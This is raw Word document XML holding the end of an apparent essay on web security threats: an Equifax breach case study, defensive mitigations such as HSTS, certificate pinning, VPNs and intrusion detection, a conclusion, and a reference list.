        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00117950">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Equifax MITM Exposure (2017)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243B495D"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lastRenderedPageBreak/>
        <w:t>The 2017 Equifax breach, affecting 147 million users, originated from an Apache Struts vulnerability but exposed MITM risks due to unencrypted internal traffic. Attackers accessed PII like credit histories over months; Krebs on Security (2017) noted that MITM could have intercepted data flows between servers, amplifying the breach’s scope. Losses exceeded $1.4 billion, with fines, lawsuits, and reputational damage piling up. “Encryption gaps were a ticking bomb,” Krebs wrote, criticizing Equifax’s failure to secure internal communications—a lesson in end-to-end protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117A2EB5"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6.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00117950">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Mitigation Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175E98E4"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HTTPS with HSTS (Strict-Transport-Security: max-age=31536000; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>includeSubDomains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) enforces encryption and prevents downgrade attacks, ensuring browsers reject HTTP. Certificate pinning binds domains to specific certificates, blocking fakes, though it requires diligent updates to avoid breaking legitimate connections. VPNs secure public network traffic, ideal for remote workers or travelers but less practical for casual users. A robust Public Key Infrastructure (PKI) validates certificates via trusted CAs like Let’s Encrypt or DigiCert. Tools like Wireshark (used ethically) or intrusion detection systems (e.g., Snort, Suricata) monitor for anomalies—unusual packet patterns or IP spoofing—enhancing detection alongside technical defenses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231C3314" w14:textId="77777777" w:rsidR="00075C06" w:rsidRPr="00117950"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7. </w:t>
      </w:r>
      <w:r w:rsidRPr="00117950">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE04E5A" w14:textId="77777777" w:rsidR="00075C06" w:rsidRPr="00075C06" w:rsidRDefault="00075C06" w:rsidP="00075C06">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Web security threats—SQL Injection, XSS, CSRF, Session Hijacking, and MITM Attacks—pose persistent risks in 2025, fueled by coding oversights, misconfigurations, and sophisticated adversaries. Real-world incidents like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MOVEit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ($10 billion in damages) and Equifax (147 million affected) underscore their devastating financial and human toll. Mitigation requires a layered approach: parameterized queries neutralize SQL Injection, CSPs curb XSS, tokens block CSRF, </w:t>
      </w:r>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>secure sessions foil hijacking, and encryption thwarts MITM. As AI-driven attacks, quantum vulnerabilities, and IoT complexities emerge, developers must embrace proactive strategies—automated vulnerability scanning, zero-trust architectures, and continuous security training. Securing the web transcends technical fixes; it’s a commitment to protecting users and preserving trust in an increasingly digital world.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE640B2" w14:textId="77777777" w:rsidR="00D021E0" w:rsidRDefault="00D021E0" w:rsidP="00075C06">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76DA6152" w14:textId="77777777" w:rsidR="00D021E0" w:rsidRDefault="00D021E0" w:rsidP="00075C06">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B20F47E" w14:textId="77777777" w:rsidR="00D021E0" w:rsidRDefault="00D021E0" w:rsidP="00075C06">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="555A5F45" w14:textId="77777777" w:rsidR="00D021E0" w:rsidRDefault="00D021E0" w:rsidP="00075C06">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03DE99E9" w14:textId="77777777" w:rsidR="00D021E0" w:rsidRDefault="00D021E0" w:rsidP="00075C06">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13D7E616" w14:textId="77777777" w:rsidR="00D021E0" w:rsidRDefault="00D021E0" w:rsidP="00075C06">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61B2B66E" w14:textId="77777777" w:rsidR="00D021E0" w:rsidRDefault="00D021E0" w:rsidP="00075C06">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41849599" w14:textId="77777777" w:rsidR="00D021E0" w:rsidRDefault="00D021E0" w:rsidP="00075C06">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="455E61CB" w14:textId="77777777" w:rsidR="00D021E0" w:rsidRDefault="00D021E0" w:rsidP="00075C06">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A4660DC" w14:textId="77777777" w:rsidR="00D021E0" w:rsidRDefault="00D021E0" w:rsidP="00075C06">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5151D0D8" w14:textId="77777777" w:rsidR="00D021E0" w:rsidRDefault="00D021E0" w:rsidP="00075C06">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FE1B90A" w14:textId="77777777" w:rsidR="00D021E0" w:rsidRDefault="00D021E0" w:rsidP="00075C06">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40ABDF8F" w14:textId="77777777" w:rsidR="00D021E0" w:rsidRDefault="00D021E0" w:rsidP="00075C06">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="177EE76A" w14:textId="77777777" w:rsidR="00D021E0" w:rsidRDefault="00D021E0" w:rsidP="00075C06">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15A6FBB8" w14:textId="7EED6371" w:rsidR="00D021E0" w:rsidRPr="00D021E0" w:rsidRDefault="00075C06" w:rsidP="00D021E0">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">8. </w:t>
      </w:r>
      <w:r w:rsidR="00D021E0" w:rsidRPr="00117950">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>REFERENCES</w:t>
      </w:r>
      <w:r w:rsidR="00D021E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F055FF0" w14:textId="21AE997C"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9" w:history="1">
        <w:r w:rsidRPr="00D021E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Verizon Data Breach Investigations Report (2020)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7CF9AFEC" w14:textId="2ADF7167"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0" w:history="1">
        <w:r w:rsidRPr="00D021E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>IBM’s 2023 Cost of a Data Breach Report</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2D362252" w14:textId="4E6093DE"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1" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00D021E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>BleepingComputer</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="00D021E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t xml:space="preserve"> (2023) </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00D021E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>MOVEit</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="00D021E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t xml:space="preserve"> Transfer Breach</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="10CF6C2C" w14:textId="246E0B6F"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2" w:anchor="comments" w:history="1">
        <w:r w:rsidRPr="00D021E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Krebs on Security (</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00D021E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>MOVEit</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="00D021E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t xml:space="preserve"> Transfer)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0075994C" w14:textId="1E2F8BD3"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3" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00D021E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>RiskIQ</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="00D021E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t xml:space="preserve"> (2018) British Airways XSS Attack</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3A86ACC3" w14:textId="2BD91030"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4" w:history="1">
        <w:r w:rsidRPr="00D021E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>TechCrunch (2010) Twitter CSRF Vulnerability</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5B9E7880" w14:textId="75D36F35"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5" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00D021E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Appthority</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="00D021E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t xml:space="preserve"> (2018) Firebase Misconfiguration</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6981ACA0" w14:textId="5388611B" w:rsidR="007F3AB6" w:rsidRPr="00D021E0" w:rsidRDefault="007F3AB6" w:rsidP="00D021E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4680"/>
        </w:tabs>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId16" w:anchor=":~:text=In%20September%202017%2C%20Equifax%20disclosed,data%20on%20147%20million%20Americans." w:history="1">
        <w:r w:rsidRPr="00D021E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Krebs on Security (2017) Equifax Breach</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2EC86612" w14:textId="067DF432" w:rsidR="007F3AB6"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7" w:history="1">
        <w:r w:rsidRPr="00D021E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>OWASP (Open Web Application Security Project)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0FC4E446" w14:textId="7BE9121B" w:rsidR="00B7389E" w:rsidRPr="00D021E0" w:rsidRDefault="007F3AB6" w:rsidP="00D021E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="00D021E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>SANS Institute</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:sectPr w:rsidR="00B7389E" w:rsidRPr="00D021E0" w:rsidSect="00DA3E7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C4300"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2786C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A4871"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A2843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40F88"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2682D2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A7E48"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C7AA74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76F05"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1D42E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0764883">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1802916162">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="880282973">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="193035956">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1515338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77"/>
    <w:rsid w:val="000002B4"/>
    <w:rsid w:val="00075C06"/>
    <w:rsid w:val="000A0EDC"/>
    <w:rsid w:val="00117950"/>
    <w:rsid w:val="00126BFE"/>
    <w:rsid w:val="004A0923"/>
    <w:rsid w:val="005A3148"/>
    <w:rsid w:val="00647B58"/>
    <w:rsid w:val="007F3AB6"/>
    <w:rsid w:val="00967003"/>
    <w:rsid w:val="00A32DD4"/>
    <w:rsid w:val="00B7389E"/>
    <w:rsid w:val="00BC0E81"/>
    <w:rsid w:val="00BE5C0F"/>
    <w:rsid w:val="00C42B93"/>
    <w:rsid w:val="00C810EF"/>
    <w:rsid w:val="00CB7732"/>
    <w:rsid w:val="00D021E0"/>
    <w:rsid w:val="00DA3E77"/>
    <w:rsid w:val="00DA6BEE"/>
    <w:rsid w:val="00E85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C298"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E4004819-B036-43E9-906F-940113A0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E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3E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E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E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3E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3E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E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E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E77"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00DA3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E77"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00DA3E77"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00DA3E77"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00DA3E77"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00DA3E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E77"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00DA3E77"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:link w:val="NoSpacingChar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00DA3E7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A3E77"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:kern w:val="0"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00117950"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00117950"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00117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xhere.com/en/photo/744125" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bbc.com/news/technology-45481976" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sans.org/sg_en/"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krebsonsecurity.com/2023/06/cisa-order-highlights-persistent-risk-at-network-edge/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-top-ten/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://krebsonsecurity.com/tag/equifax-brea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leepingcomputer.com/news/security/sec-ends-probe-into-moveit-attacks-impacting-95-million-people/" 